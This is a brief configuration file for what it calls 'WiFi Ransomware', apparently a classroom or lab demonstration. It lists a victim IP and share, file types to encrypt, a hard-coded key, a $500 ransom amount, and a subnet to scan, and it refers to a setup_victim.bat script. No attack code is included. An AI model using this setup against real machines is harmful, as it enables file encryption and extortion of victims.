# WiFi Ransomware Configuration
# Run setup_victim.bat on victim first!

# Victim information (get from victim after setup)
VICTIM_IP = 192.168.1.100
VICTIM_NAME = DESKTOP-VICTIM
SHARE_NAME = RansomDemo

# What files to encrypt
TARGET_EXTENSIONS = .txt,.docx,.pdf,.jpg
ENCRYPTION_KEY = cybersecurity_demo_2024
RANSOM_AMOUNT = $500

# Network settings
SCAN_NETWORK = yes
NETWORK_RANGE = 192.168.1.0/24